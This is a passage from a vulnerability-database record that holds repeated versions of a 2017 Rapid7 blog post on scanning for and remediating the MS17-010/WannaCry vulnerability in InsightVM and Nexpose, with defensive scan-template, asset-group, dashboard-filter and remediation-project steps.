dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:2d29ad65-32b0-457f-8346-e45e3999e711] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-18T16:33:44", "lastseen": "2017-05-20T04:49:54"}, "differentElements": ["description"], "edition": 3}, {"lastseen": "2017-05-22T15:50:32", "bulletin": {"published": "2017-05-22T15:17:48", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 24, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:9aaf21e0-15e1-48d2-b2f5-fa04fcd9566f] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span>asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a> </p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:9aaf21e0-15e1-48d2-b2f5-fa04fcd9566f] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-22T15:17:48", "lastseen": "2017-05-22T15:50:32"}, "differentElements": ["description"], "edition": 5}, {"lastseen": "2017-05-20T14:50:01", "bulletin": {"published": "2017-05-18T16:33:44", "enchantments": {}, "id": "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "objectVersion": "1.4", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 20, "reporter": "Nathan Palanov", "references": [], "type": "rapid7community", "history": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:7799e1bb-a165-4562-9f7e-a380f1695f31] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66979/pastedImage_1.png\"><img class=\"image-16 jive-image\" height=\"477\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66979/pastedImage_1.png\" style=\"max-width:664px; max-\" width=\"664\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR 